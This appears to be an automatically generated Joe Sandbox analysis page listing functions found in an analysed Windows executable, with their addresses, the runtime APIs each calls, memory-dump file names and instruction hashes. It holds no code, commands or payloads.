                                                                                      Similarity
                                                                                      • API ID: __floor_pentium4
                                                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                      • API String ID: 4168288129-2761157908
                                                                                      • Opcode ID: e10739117bab0f38ee393d5afb1d0af2d58d12564532ac9724e0abf39dbc9394
                                                                                      • Instruction ID: e50cca27e08be5cc45ff889d3a3dfaedd8d078c35bd69298574475a60c4b375a
                                                                                      • Opcode Fuzzy Hash: e10739117bab0f38ee393d5afb1d0af2d58d12564532ac9724e0abf39dbc9394
                                                                                      • Instruction Fuzzy Hash: 9EC26A71E046288FDB25CE28ED407EAB3B5EB84305F5541EBD80DE7240E778AE918F85
                                                                                      Function 0040276C Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 793COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00402775
                                                                                      • _strlen.LIBCMT ref: 00402CFF
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00402E56
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prologUnothrow_t@std@@@__ehfuncinfo$??2@_strlen
                                                                                      • String ID: CMT
                                                                                      • API String ID: 3741668355-2756464174
                                                                                      • Opcode ID: 3fcc10ef119ae08286ff6896c19eecf55bb7bbbc4ae4efd4232360e4defe4414
                                                                                      • Instruction ID: 2799a550df5717b1489d928a2b28ed197d0f113527a5322214b2ad65d00cc043
                                                                                      • Opcode Fuzzy Hash: 3fcc10ef119ae08286ff6896c19eecf55bb7bbbc4ae4efd4232360e4defe4414
                                                                                      • Instruction Fuzzy Hash: 0062D4719002448FDB18DF75C9896EA3BE5AF58304F04457FEC8AAB3C2DBB89949CB54
                                                                                      Function 00425B53 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00425C4B
                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00425C55
                                                                                      • UnhandledExceptionFilter.KERNEL32(-00000311,?,?,?,?,?,00000000), ref: 00425C62
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                      • String ID:
                                                                                      • API String ID: 3906539128-0
                                                                                      • Opcode ID: 5b402a4088d21ae412fc8a3c7cf1340c840b177189ee0bac6582440d6838c64d
                                                                                      • Instruction ID: 8bc7ff493eb23c624a4d8d51066ab69365286bb0d14cbcbf8dd5e92118e627f6
                                                                                      • Opcode Fuzzy Hash: 5b402a4088d21ae412fc8a3c7cf1340c840b177189ee0bac6582440d6838c64d
                                                                                      • Instruction Fuzzy Hash: 1D31B3B5D013289BCB21DF69D9897DDBBB8BF18310F5042EAE41CA7250E7749B818F48
                                                                                      Function 00429EB0 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: adb73a532f26a33538fd5fb2ed24ee19948087a43571b45bda065bffbee46b1a
                                                                                      • Instruction ID: d13349a72730bd24d82249ac632ad852ccb65984af13935171e2255f4327feb5
                                                                                      • Opcode Fuzzy Hash: adb73a532f26a33538fd5fb2ed24ee19948087a43571b45bda065bffbee46b1a
                                                                                      • Instruction Fuzzy Hash: B2027C71E002299FDF14CFA9D8806AEF7F1EF48324F65816AD815E7380D735AD118B95
                                                                                      Function 0041932F Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00419355
                                                                                      • GetNumberFormatW.KERNEL32(00000400,00000000,?,0043A154,?,?), ref: 004193A4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: FormatInfoLocaleNumber
                                                                                      • String ID:
                                                                                      • API String ID: 2169056816-0
                                                                                      • Opcode ID: 136972e29aded3648d79152abaf2305009f544dbc4374374e7a236e0ba091e0d
                                                                                      • Instruction ID: 10841ce58ae48a899f18d83561abf6ffac88627ed528167507aae241650d83f0
                                                                                      • Opcode Fuzzy Hash: 136972e29aded3648d79152abaf2305009f544dbc4374374e7a236e0ba091e0d
                                                                                      • Instruction Fuzzy Hash: 44019E75140308ABDB108FA0DC05FAB77BCEF09710F005436BA04E71A1D7749925CBAA
                                                                                      Function 0042E8D4 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0042E8CF,?,?,00000008,?,?,0042E56F,00000000), ref: 0042EB01
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionRaise
                                                                                      • String ID:
                                                                                      • API String ID: 3997070919-0
                                                                                      • Opcode ID: 2efdb38d6f8dae49581ad2e934fb938510242d5284ba94e25f7ed2d6d05831aa
                                                                                      • Instruction ID: 2239f2d6d8d6fb9b18873fdbe64a9e7f3f1e4093cd7c72b91be474660127ec6f
                                                                                      • Opcode Fuzzy Hash: 2efdb38d6f8dae49581ad2e934fb938510242d5284ba94e25f7ed2d6d05831aa
                                                                                      • Instruction Fuzzy Hash: 51B16B31210618CFDB15CF29D48AB657BE0FF45364F65865AE89ACF3A1C339E982CB44
                                                                                      Function 00403FC5 Relevance: 1.6, Strings: 1, Instructions: 332COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: gj
                                                                                      • API String ID: 0-4203073231
                                                                                      • Opcode ID: 3b690d12a1b2516ae3765c73cd49df4d9623ea89e038fc541eed540fa6846895
                                                                                      • Instruction ID: 86f79434ad5e4c1c9555b7c6a3bff1f8ec43d53b3cfdd72053e665a554099537
                                                                                      • Opcode Fuzzy Hash: 3b690d12a1b2516ae3765c73cd49df4d9623ea89e038fc541eed540fa6846895
                                                                                      • Instruction Fuzzy Hash: ABF1F4B2A083418FD348CF29D890A1AFBE1BFC8208F14992EF998D7711D734E9558F56
                                                                                      Function 0040A8E0 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetVersionExW.KERNEL32(?), ref: 0040A905
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: Version
                                                                                      • String ID:
                                                                                      • API String ID: 1889659487-0
                                                                                      • Opcode ID: 77cc60c088a479c98dfbe18cd1b8abb71eb473ed596bd7940bfc1839bb767939
                                                                                      • Instruction ID: 01d4f18c07da7b2f11fceccc9854386fe72919e36506f7316c5522edeb569e07
                                                                                      • Opcode Fuzzy Hash: 77cc60c088a479c98dfbe18cd1b8abb71eb473ed596bd7940bfc1839bb767939
                                                                                      • Instruction Fuzzy Hash: 07F030B5A003088BCB28CF18EC82AE5B3B5F759314F2156B5D91573390D374AD918F5A
                                                                                      Function 0041DBC3 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_0001DBCF,0041D604), ref: 0041DBC8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                      • String ID:
                                                                                      • API String ID: 3192549508-0
                                                                                      • Opcode ID: b851c5a598c5e23e710a7c13772d0a048c494ea2914c69954882ca90c40e31f1
                                                                                      • Instruction ID: 4f53188556a6ef6076aad6d5fe0bb1f10976768f428eb50103e3d295b806f1de
                                                                                      • Opcode Fuzzy Hash: b851c5a598c5e23e710a7c13772d0a048c494ea2914c69954882ca90c40e31f1
                                                                                      • Instruction Fuzzy Hash:
                                                                                      Function 0040DBE2 Relevance: 1.4, Strings: 1, Instructions: 154COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 8C
                                                                                      • API String ID: 0-2849189062
                                                                                      • Opcode ID: 7208dce39fa71b10af863625e025e815fcd21d6305fd714ff63af232737f43f9
                                                                                      • Instruction ID: 131fdb21aeda73f922136a5ffddf3fc278d735410ec39c66c72ae7b6cb3c8856
                                                                                      • Opcode Fuzzy Hash: 7208dce39fa71b10af863625e025e815fcd21d6305fd714ff63af232737f43f9
                                                                                      • Instruction Fuzzy Hash: FF51233190C3954ED712CF2AC1800AEBFE0AFDA314F4958AEE4D55B292C138D68DCB5A
                                                                                      Function 00428AAA Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: HeapProcess
                                                                                      • String ID:
                                                                                      • API String ID: 54951025-0
                                                                                      • Opcode ID: 4d8b9e40af4376da57ddcbb23a450cf436684ee3703a4a5c80d5b98a27cc9c7c
                                                                                      • Instruction ID: 6f8d721a7f26fd8cb4698955ac085fd7a4f9aa386fb5cde1c1e6eda3a928e7fb
                                                                                      • Opcode Fuzzy Hash: 4d8b9e40af4376da57ddcbb23a450cf436684ee3703a4a5c80d5b98a27cc9c7c
                                                                                      • Instruction Fuzzy Hash: A2A02230202300CFAB208F32AF0A30C3AE8FB023C2300A03CA808C2230EB30C0008B08
                                                                                      Function 00414FB5 Relevance: .8, Instructions: 800COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f76edbdb3f4a612c21f71557bb68a806c2ac5dff8f8e7f0331655fa6002ea0a3
                                                                                      • Instruction ID: e12e830cb657b9cb1f48023ef0410134c24d57a5825d0efe0722172b3e54ff22
                                                                                      • Opcode Fuzzy Hash: f76edbdb3f4a612c21f71557bb68a806c2ac5dff8f8e7f0331655fa6002ea0a3
                                                                                      • Instruction Fuzzy Hash: A3621B71604B84DFCB25CF38C5906FABBE1AF95304F04855FD8AA8B346D738A985CB19
                                                                                      Function 004163F2 Relevance: .8, Instructions: 773COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 90a98d7e6f2e54dcba7a323e5310e852aff7c38bf50c3d5cf95a57ea582718e0
                                                                                      • Instruction ID: b9e2a920327e2e300b450146c55f4534af932b7c18876076ab40d16e583870c4
                                                                                      • Opcode Fuzzy Hash: 90a98d7e6f2e54dcba7a323e5310e852aff7c38bf50c3d5cf95a57ea582718e0
                                                                                      • Instruction Fuzzy Hash: E06222706047869FC719CF28C9805F9FBE1BF45308F15866ED8A687742D338E996CB89
                                                                                      Function 0040E045 Relevance: .7, Instructions: 694COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c11df8756d099823b9e38222dbb77727418297263203a366b416988efb5d9dfb
                                                                                      • Instruction ID: 6f5b1dbf781e30d91f938b49252e420c8a3c85470b0c4bcd3299a691079ecf70
                                                                                      • Opcode Fuzzy Hash: c11df8756d099823b9e38222dbb77727418297263203a366b416988efb5d9dfb
                                                                                      • Instruction Fuzzy Hash: 285259B26047019FC758CF19C891A6AF7E1FFC8304F89892DF58697355D334E9198B86
                                                                                      Function 00415DB9 Relevance: .5, Instructions: 509COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f96851dbf8ea0b2b86b77443680f696db59c6c82e85e1f28ded3cc7cdb2d9680
                                                                                      • Instruction ID: e032d804e6acf4d64e043022f72fea69207801ded6937ff826eeeb70bdeb067d
                                                                                      • Opcode Fuzzy Hash: f96851dbf8ea0b2b86b77443680f696db59c6c82e85e1f28ded3cc7cdb2d9680
                                                                                      • Instruction Fuzzy Hash: 4A12D3B16047068BC728DF28C9906F9B3E1FB55308F14892EE997C7A81D778E8D5CB49
                                                                                      Function 0040BA1A Relevance: .4, Instructions: 449COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ece2fd13e2a1b1f5a1be01ed4d33fbf5013911ff3fcc67e35f8d7caac775effe
                                                                                      • Instruction ID: 622719d8a1a10a35974c9934b72fba85760963c559cd653b786935e945387f27
                                                                                      • Opcode Fuzzy Hash: ece2fd13e2a1b1f5a1be01ed4d33fbf5013911ff3fcc67e35f8d7caac775effe
                                                                                      • Instruction Fuzzy Hash: 00F189716083468FC724CE29C58496BBBE2FFC9714F144A2EF485A7395D738E9058B8E
                                                                                      Function 0041F693 Relevance: .3, Instructions: 345COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                      • Instruction ID: 147d78a1515ad5d8c12ef591ffa6e2840d46d936d0abaa31ba9844ea94cd6117
                                                                                      • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                      • Instruction Fuzzy Hash: 96C1E6762050530ADB2D463995300BFBEA15E927B131A03BFD4B7CB2D4FE28D5AEC528
                                                                                      Function 0041FAC8 Relevance: .3, Instructions: 341COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                      • Instruction ID: ac58f7f8018d66a7f0788fad939229ef175f8f9987f175b2ab9d8b5b27ab65ed
                                                                                      • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                      • Instruction Fuzzy Hash: B8C1D6762091930ADB2D4639D4300BFBEA15A917B131A03BFD4B3CB2D5FE28D5AED518
                                                                                      Function 0041F25E Relevance: .3, Instructions: 331COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                      • Instruction ID: dd47947da822c77e595303fe618f9a3e618e10aea536a7bf079f06be5e16122e
